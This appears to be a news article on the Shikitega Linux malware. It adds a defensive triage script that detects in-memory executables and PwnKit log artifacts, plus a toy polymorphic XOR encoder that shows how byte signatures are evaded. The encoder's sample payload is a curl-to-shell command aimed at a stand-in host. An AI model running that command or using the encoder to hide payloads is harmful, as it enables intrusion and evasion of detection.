Shikitega is a newly discovered piece of stealthy Linux malware that uses a multi-stage infection chain to compromise endpoints and IoT devices…depositing further payloads.
In new research released last Tuesday, AT&T Alien Labs stated that an attacker “may take complete control of the system, in addition to the cryptocurrency miner that will be executed and set to persist.”
The finding adds to a growing list of Linux malware discovered in the wild recently, alongside BPFDoor, Symbiote, Syslogk, OrBit, and Lightning Framework.
What makes Shikitega elusive is that it downloads next-stage payloads from a command-and-control (C2) server and executes them directly in memory rather than from disk. The initial access vector, that is, how the first compromise is achieved, is still unknown.
Privilege escalation relies on two known vulnerabilities, CVE-2021-4034 (PwnKit, in polkit's pkexec) and CVE-2021-3493 (an Ubuntu OverlayFS flaw). With root privileges the malware fetches and runs the final-stage shell scripts, which establish persistence and deploy a Monero cryptocurrency miner.
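Two host-triage checks follow from the behaviour described above: payloads that run only from memory, and privilege escalation through PwnKit. The script below is an added example written for this page, not code from the AT&T Alien Labs research or from the malware. Its assumptions are labelled: the page does not say which mechanism Shikitega uses to execute in memory, so the first check looks for the common memfd_create() pattern, where /proc/<pid>/exe resolves to "/memfd:<name> (deleted)"; the pkexec log indicators are the messages pkexec itself writes during a noisy PwnKit exploitation attempt, as documented in the public advisory; the auth-log lines are constructed sample data, not a real incident.

```python
"""Host triage helpers: memory-only executables and PwnKit (CVE-2021-4034) artifacts.

Added example, not code from the AT&T Alien Labs research.
Assumptions (see lead-in): memfd-style in-memory execution is a common Linux
technique, not one the page attributes to Shikitega specifically; the pkexec
log strings below are the ones pkexec writes (the misspelling "suscipious"
is in pkexec's own source, so match it verbatim).
"""
import os
import re
import stat

MEMFD_RE = re.compile(r"^/memfd:.*\(deleted\)$")
PKEXEC_INDICATORS = (
    "The value for the SHELL variable was not found the /etc/shells file",
    "contains suscipious content",
)


def is_memfd_exe(exe_target: str) -> bool:
    """True if a /proc/<pid>/exe link target points at an anonymous memfd file."""
    return bool(MEMFD_RE.match(exe_target))


def scan_proc_for_memfd(proc_root: str = "/proc"):
    """Yield (pid, exe_target) for live processes whose executable exists only in memory.
    Reading other users' exe links needs root; unreadable entries are skipped."""
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(proc_root, entry, "exe"))
        except OSError:
            continue
        if is_memfd_exe(target):
            yield int(entry), target


def pkexec_alerts(log_lines):
    """Return the auth-log lines carrying PwnKit exploitation artifacts from pkexec."""
    return [ln for ln in log_lines
            if "pkexec" in ln and any(ind in ln for ind in PKEXEC_INDICATORS)]


def pkexec_is_setuid(path: str = "/usr/bin/pkexec") -> bool:
    """True if pkexec is still setuid root. The published interim mitigation for
    hosts that cannot be patched is to drop the bit (chmod 0755 /usr/bin/pkexec),
    so False is the safe state on an unpatched host."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return bool(st.st_mode & stat.S_ISUID) and st.st_uid == 0


# Constructed sample log lines (not from a real incident) to exercise the filter.
SAMPLE_AUTH_LOG = [
    "Sep  6 10:01:02 host pkexec[4121]: user: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=unknown] [CWD=/tmp] [COMMAND=GCONV_PATH=./pwnkit]",
    "Sep  6 10:01:02 host pkexec[4122]: user: The value for environment variable XAUTHORITY contains suscipious content [USER=root] [TTY=unknown] [CWD=/tmp] [COMMAND=GCONV_PATH=./pwnkit]",
    "Sep  6 10:01:05 host sshd[4130]: Accepted publickey for user from 10.0.0.5 port 51234 ssh2",
]

if __name__ == "__main__":
    for pid, target in scan_proc_for_memfd():
        print(f"memory-only executable: pid {pid} -> {target}")
    for line in pkexec_alerts(SAMPLE_AUTH_LOG):
        print("PwnKit artifact:", line)
    print("pkexec setuid root:", pkexec_is_setuid())
```

Run it as root on a suspect host; a pkexec that is no longer setuid and an empty memfd list are the expected clean results. The absence of pkexec log lines is not proof of safety, since a careful exploit can avoid triggering them, so treat the log check as one signal among several.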
To further evade detection, the operators encode their payloads with Metasploit's "Shikata ga nai" polymorphic encoder, so antivirus engines cannot rely on static byte signatures, and they host C2 infrastructure on legitimate cloud services.
Shikitega is also a sign of a broader pattern in which threat actors are expanding their attacks to target Linux, which is widely used on servers and cloud platforms worldwide. The same trend has brought a rise in Linux infections by the LockBit and Cheerscrypt ransomware families.
The introduction of these new Linux ransomware families closely correlates to […] a 75% rise in ransomware attacks targeting Linux systems in the first half of 2022 compared to the first half of 2021, according to Trend Micro's 2022 Midyear Cybersecurity Report.

Threat actors keep looking for novel ways to spread malware so they can evade detection, according to Ofer Caspi, an AT&T Alien Labs researcher.
Shikitega delivers its payload in stages through the polymorphic encoder, so each stage exposes only a portion of the complete payload.
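The two passages above lean on the polymorphic encoder, so it helps to see what "polymorphic" buys an attacker. Shikata ga nai is an XOR additive-feedback encoder: each block is XORed with a running key, and the decoded block is then added into the key before the next block. The toy below, an added illustration written for this page and not the real x86 encoder or any code from the malware, reproduces that principle in Python. The payload string and the "antivirus signature" are constructed stand-ins, not real shellcode or a real detection rule.

```python
"""Toy additive-feedback XOR encoder showing why a polymorphic encoder defeats
byte-signature matching. Added illustration of the principle behind Metasploit's
shikata_ga_nai; the real encoder emits a randomised x86 decoder stub, while here
the decoder is a Python function. PAYLOAD and SIGNATURE are constructed."""
import os
import struct

BLOCK = 4  # 32-bit dwords, as in the x86 encoder
MASK = 0xFFFFFFFF


def _pad(payload: bytes) -> bytes:
    # pad with 0x90 so the length is a multiple of the block size
    return payload + b"\x90" * (-len(payload) % BLOCK)


def encode(payload: bytes, seed: int) -> bytes:
    """XOR each dword with the running key, then add the *plaintext* dword to the
    key (additive feedback). Every block after the first therefore depends on all
    the plaintext before it, and a different seed changes every output byte."""
    key = seed & MASK
    data = _pad(payload)
    out = bytearray()
    for i in range(0, len(data), BLOCK):
        (plain,) = struct.unpack("<I", data[i:i + BLOCK])
        out += struct.pack("<I", plain ^ key)
        key = (key + plain) & MASK
    return bytes(out)


def decode(blob: bytes, seed: int) -> bytes:
    """Mirror of encode(): XOR with the key, then feed the recovered plaintext dword
    back into the key before moving on. Stage n cannot be recovered without the
    stages before it, which is the 'reveal only a portion at a time' property."""
    key = seed & MASK
    out = bytearray()
    for i in range(0, len(blob), BLOCK):
        (enc,) = struct.unpack("<I", blob[i:i + BLOCK])
        plain = enc ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & MASK
    return bytes(out)


def polymorphic_variants(payload: bytes, n: int):
    """Encode the same payload n times under fresh random seeds. Each result is a
    different byte string, so a signature written against one will not match
    the others."""
    variants = []
    for _ in range(n):
        seed = int.from_bytes(os.urandom(4), "little")
        variants.append((seed, encode(payload, seed)))
    return variants


def signature_hits(blob: bytes, signature: bytes) -> bool:
    """Naive static check: does a fixed byte pattern occur in the blob?"""
    return signature in blob


# Constructed stand-in for a stage-two payload; not real shellcode.
PAYLOAD = b"/bin/sh -c 'curl -s http://203.0.113.1/stage2 | sh'"
SIGNATURE = b"curl -s http://"

if __name__ == "__main__":
    for seed, blob in polymorphic_variants(PAYLOAD, 3):
        assert decode(blob, seed)[:len(PAYLOAD)] == PAYLOAD
        print(hex(seed), blob[:16].hex(), "signature hit:", signature_hits(blob, SIGNATURE))
```

The encoded bytes change on every run while the decoded payload does not, which is why detection engineering for encoders like this focuses on the decoder loop and on runtime behaviour (the in-memory execution, the privilege escalation, the miner) rather than on the encoded payload bytes.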